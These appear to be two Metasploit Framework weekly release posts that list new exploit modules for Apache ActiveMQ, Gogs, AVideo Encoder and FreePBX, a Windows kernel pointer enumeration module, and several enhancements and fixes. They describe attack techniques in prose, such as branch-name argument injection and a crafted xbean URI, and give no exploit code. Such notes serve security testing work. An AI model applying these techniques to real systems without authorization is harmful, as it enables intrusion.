When Open Source is a bit too Open

Several fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their branch --exec <command> and requesting a rebase.

Another useful post module by CharlesQuinnDev enumerates the Kernel pointers leaked via the popular NtQuerySystemInformation technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call!

New module content (3)

Apache ActiveMQ RCE via Jolokia addNetworkConnector

Authors: dinosn and h00die
Type: Exploit
Pull request: #21497 contributed by h00die
Path: multi/http/apache_activemq_jolokia_rce
AttackerKB reference: CVE-2026-34197

Adds a new exploit module exploit/multi/http/apache_activemq_jolokia_rce targeting CVE-2026-34197 in Apache ActiveMQ. The module abuses the Jolokia JMX-over-HTTP API exposed at /api/jolokia/ by calling the addNetworkConnector() MBean operation with a crafted brokerConfig=xbean:http://... URI. ActiveMQ fetches the attacker-controlled URL and instantiates it as a Spring XML application context, achieving remote code execution via a java.lang.ProcessBuilder bean. Authentication is required to exploit this vulnerability.

Gogs Git Rebase Argument Injection RCE

Author: Crypto-Cat
Type: Exploit
Pull request: #21515 contributed by jburgess-r7
Path: multi/http/gogs_rebase_rce

This adds an exploit module for the Gogs rebase Remote Code Execution (RCE) vulnerability. The module leverages an argument injection flaw residing in the pull request merge workflow of Gogs versions <= 0.14.2 and <= 0.15.0+dev.

Windows Kernel Pointer Exposure Enumerator

Author: CharlesQuinnDev
Type: Post
Pull request: #21039 contributed by CharlesQuinnDev
Path: windows/gather/windows_kernel_pointer_enum

Adds a new post module for Windows that enumerates kernel object pointers exposed through NtQuerySystemInformation on x64 systems. The module collects observable handle metadata and provides analysis of pointer distribution, object types, and ALPC usage, then saves the results to a CSV loot file for review. Also introduces a reusable Windows kernel handle-enumeration library.

Enhancements and features (7)

• #20881 from h00die - This adds support for cracking Kerberos type hashes in Metasploit, specifically timeroasting, krb5tgs* and krb5asrep.
• #21087 from jbx81-1337 - The new payloads_manager plugin lets you maintain a local archive of custom payloads and stage them into the data directory. Use the fetch or add subcommands to download or import a payload, then select to symlink it into place so it's available to other modules. The plugin tracks each payload's name, hash, tags, and description in a database.
• #21412 from zeroSteiner - Updates Metasploit's post modules to now run by default against the last opened alive session, unless explicitly specified.
• #21429 from zeroSteiner - Removes the now redundant Linux-specific method for finding the arch so there's a single source of truth that works in a superset of platform / session-type combinations.
• #21488 from sjanusz-r7 - Updates HTTP login scanners to report the detected service hierarchy.
• #21504 from h00die - Adds missing CVE references to seven existing modules: gladinet_storage_access_ticket_forge (CVE-2025-14611), cassandra_web_file_read (CVE-2020-36939), pretalx_file_read_cve_2023_28459 (CVE-2023-28459 and CVE-2023-28458), centreon_pollers_auth_rce (CVE-2019-19699), wp_responsive_thumbnail_slider_upload (CVE-2015-10144), xerte_unauthenticated_template_import_rce (CVE-2026-32985), and solarwinds_storage_manager_sql (CVE-2012-2576).
• #21526 from zeroSteiner - Makes stability and logging improvements to the ipmi_cipher_zero, ipmi_dumphashes, and ipmi_version modules.

Bugs fixed (7)

• #21432 from 4ravind-b - Fixes a bug in modules that invoke other modules that prevented datastore options from being validated.
• #21448 from kx7m2qd - Fixes an issue where CIDR range filters in the addresses parameter of the db.hosts RPC endpoint were not processed correctly.
• #21484 from zeroSteiner - Fixes python ssl command shell payloads that failed with AttributeError: module 'ssl' has no attribute 'wrap_socket'.
• #21489 from h00die - Improves the GitLab version scanner by handling additional exceptions in the scanner for non-GitLab targets and adding additional version fingerprints for real GitLab targets.
• #21502 from h00die - Fixes a crash in the scanner/snmp/snmp_enum module when the system date was read as Null.
• #21506 from h00die - Adds a guard clause when running uname -r in WSL startup_folder persistence.
• #21514 from orbit-bot - Fixes a couple of references to outdated msfvenom options.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.135...6.4.136
• Full diff 6.4.135...6.4.136

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

♫ I Just Called ♫ To Say ♫ 7f45 4c46 0201 0100 0000 0000 0000 0000 0300 3e00 0100♫

This release contains 2 new exploit modules, 2 enhancements, and 7 bug fixes. Community contributor Chocapikk submitted both exploit modules this release: one targeting AVideo-Encoder’s getImage.php file and another targeting FreePBX. Leading the enhancements is a granularization for LDAP queries allowing the omission of SACL data on security descriptors, as without the proper permissions the entire query of the security descriptor will fail if the SACL data is even just a part of the query.

New module content (2)

AVideo Encoder getImage.php Unauthenticated Command Injection

Authors: Valentin Lobstein chocapikk@leakix.net and arkmarta

Type: Exploit

Pull request: #21076 contributed by Chocapikk

Path: linux/http/avideo_encoder_getimage_cmd_injection

AttackerKB reference: CVE-2026-29058

Description: Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder's getImage.php endpoint.

FreePBX filestore authenticated command injection

Authors: Cory Billington and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #20719 contributed by Chocapikk

Path: unix/http/freepbx_filestore_cmd_injection

AttackerKB reference: CVE-2025-64328

Description: Adds a new Metasploit exploit module for FreePBX filestore authenticated command injection (CVE-2025-64328) with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX updating affected modules accordingly.

Enhancements and features (2)

• #20730 from zeroSteiner - This update modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.
• #20997 from Nayeraneru - This adds a new OptTimedelta datastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax.

Bugs fixed (7)

• #20960 from g0tmi1k - This adds a DHCPINTERFACE option to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to.
• #21020 from g0tmi1k - This makes a small change to the docs by removing two lines that were previously duplicated.
• #21024 from Aaditya1273 - Fixes a bug in the JSON-RPC msfrpcd functionality that incorrectly required SSL certificates to be present even when disabled with msfrpcd -S.
• #21025 from Hemang360 - Fixes a crash when calling the HTTP cookie jar with non-string values.
• #21028 from SilentSobs - Fixes a crash when using the reload_all command no module is present.
• #21081 from Hemang360 - Fixes a crash when using the windows/exec with non-ascii characters.
• #21139 from jheysel-r7 - This fixes a bug in the ldap_esc_vulnerable_cert_finder module that was preventing authentication from working when making a WinRM connection.

Documentation added (1)

• #21074 from jeanmtr - Adds documentation for the pop3_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.122...6.4.123
• Full diff 6.4.122...6.4.123

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro